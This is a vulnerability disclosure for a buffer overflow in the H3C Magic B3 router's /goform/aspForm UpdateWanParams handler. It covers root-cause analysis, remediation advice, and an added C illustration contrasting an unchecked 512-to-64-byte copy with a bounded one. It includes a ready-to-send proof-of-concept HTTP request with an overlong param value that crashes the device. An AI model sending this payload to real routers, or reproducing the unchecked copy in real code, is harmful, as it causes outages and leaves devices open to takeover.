Vulnerability Title
Buffer Overflow Vulnerability in H3C Magic B3 Router /goform/aspForm Interface
Submitter
- Reporter: ZiMing Yin (殷子明)
Information
Vendor: New H3C Technologies Co., Ltd.
Vendor Website: https://www.h3c.com/cn/
Affected Product: Magic B3
Affected Firmware Version: Magic B3 <= 100R002
Firmware Download Address: https://www.h3c.com/cn/Home/Agreement//default.htm?t=H3C%20Magic%20%20B3%20V100R002%20%E7%89%88%E6%9C%AC%E8%BD%AF%E4%BB%B6%E5%8F%8A%E8%AF%B4%E6%98%8E%E4%B9%A6&s=3125484
Overview
A serious buffer overflow vulnerability exists in the H3C Magic B3 router. An attacker can trigger this vulnerability by accessing the /goform/aspForm interface and supplying a crafted param parameter, which may result in a denial of service (DoS) condition and, under specific circumstances, potentially lead to remote code execution. The exact trigger point is located in the UpdateWanParams-related processing logic.
Vulnerability Details
1. Request Handler Entry Point
The following screenshot shows the entry point of the vulnerable request handler:
[Screenshot Placeholder 1: Request handler entry point]
2. Root Cause Analysis
According to the reverse engineering results, although the length of Var is restricted to less than 512 bytes, the subsequent copy operation does not verify whether the data exceeds the size of the destination array _0.0.0.0_4, which is only 64 bytes long. This ultimately leads to a buffer overflow.
In other words, there is a clear inconsistency between the parameter validation logic and the actual memory copy operation: the initial length restriction is insufficient to ensure the safety of the destination buffer, allowing an attacker to use an overly long input to overwrite adjacent memory.
[Screenshot Placeholder 2: Length restriction and dangerous copy logic]
Proof of Concept (PoC)
An attacker can trigger the vulnerability by sending the following HTTP request to the target device:
POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 239
Cache-Control: max-age=0
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/mobile_access_net.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: USERLOGINIDFLAG=; LOGIN_PSD_REM_FLAG=
Connection: close
CMD=UpdateWanParams&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;bb
The above request passes overly long data through the param parameter, triggering the overflow point in the UpdateWanParams processing logic and causing abnormal device behavior.
[Screenshot Placeholder 3: Vulnerability trigger result]
Impact
This vulnerability may result in the following security impacts:
- Crash of the device’s Web management service
- Denial of service (DoS) on the router
- Inaccessibility of the management page or abnormal device reboot
- Potential for further exploitation leading to remote code execution under specific conditions
Because the vulnerability is located in the parameter handling and memory copy logic, and the overwrite risk is relatively direct, it presents a high security risk.
Remediation
- Perform strict length validation on all Web interface input parameters and ensure that the validation logic is consistent with the actual size of the destination buffer.
- Avoid dangerous copy operations that may cause out-of-bounds writes; use safer functions with explicit boundary limits.
- Add destination buffer size checks in the UpdateWanParams-related logic to ensure that the copy length never exceeds the actual capacity of the target array.
- It is recommended that the vendor release a patched version as soon as possible, and that users upgrade to a secure firmware version promptly.
- It is recommended to enable security mechanisms such as stack protection and FORTIFY_SOURCE during compilation to reduce the risk of similar vulnerabilities being exploited.
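Added example (not the advisory's or H3C's code) illustrating both the root-cause analysis above and the remediation items: a reconstruction in C of the mismatch between a 512-byte input limit and a 64-byte destination, next to a bounded copy whose limit is the destination's own size, plus a small parser for the `param` value in an x-www-form-urlencoded body like the PoC's. The sizes 512 and 64 come from the advisory; the function names, the form parser and the sample values are assumptions.

```c
#include <stdbool.h>
#include <string.h>

#define VAR_MAX   512   /* the only length check the advisory reports */
#define DEST_SIZE 64    /* size of the destination array the copy lands in */

/* Vulnerable pattern from the root-cause analysis (reconstructed for
 * illustration, not the router's code): the value is rejected only when it
 * is 512 bytes or longer, then copied into a 64-byte array with no check
 * against that array's size. Instead of performing the unsafe copy, this
 * returns how many bytes strcpy() would write past the end of the 64-byte
 * destination (0 means in bounds, or the request was rejected). */
size_t overflow_bytes_unchecked(const char *var) {
    size_t len = strlen(var);
    if (len >= VAR_MAX)
        return 0;                          /* rejected; never copied */
    /* strcpy(dest, var) would run here: len + 1 bytes into DEST_SIZE */
    return (len + 1 > DEST_SIZE) ? len + 1 - DEST_SIZE : 0;
}

/* Hardened copy: the bound is the destination's real capacity, passed in by
 * the caller, so the length check and the copy can never disagree. */
bool copy_bounded(char *dest, size_t dest_size, const char *var) {
    size_t len = strlen(var);
    if (dest_size == 0 || len >= dest_size)
        return false;                      /* reject: no room for the NUL */
    memcpy(dest, var, len + 1);
    return true;
}

/* Extract one value from a body such as "CMD=UpdateWanParams&param=...".
 * Writes at most out_size-1 bytes; returns false if the key is absent or
 * the value would not fit, so the caller sees a rejection, not truncation. */
bool get_form_value(const char *body, const char *key, char *out, size_t out_size) {
    size_t klen = strlen(key);
    const char *p = body;
    while (p && *p) {
        if (strncmp(p, key, klen) == 0 && p[klen] == '=') {
            const char *v = p + klen + 1;
            const char *end = strchr(v, '&');
            size_t vlen = end ? (size_t)(end - v) : strlen(v);
            if (vlen >= out_size) return false;
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return true;
        }
        p = strchr(p, '&');
        if (p) p++;                        /* skip to the next key=value pair */
    }
    return false;
}
```

With the hardened copy, the PoC-length value (210 bytes) is rejected at the check instead of overrunning the 64-byte array by 147 bytes.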
Notes
Based on the current material, the core issue of this vulnerability is that although the input variable Var is limited to less than 512 bytes, the program does not perform a secondary boundary check before copying it into a destination array of only 64 bytes. As a result, this forms a typical buffer overflow vulnerability. This issue is more accurately described as a buffer overflow caused by inconsistency between input length validation and actual destination buffer size.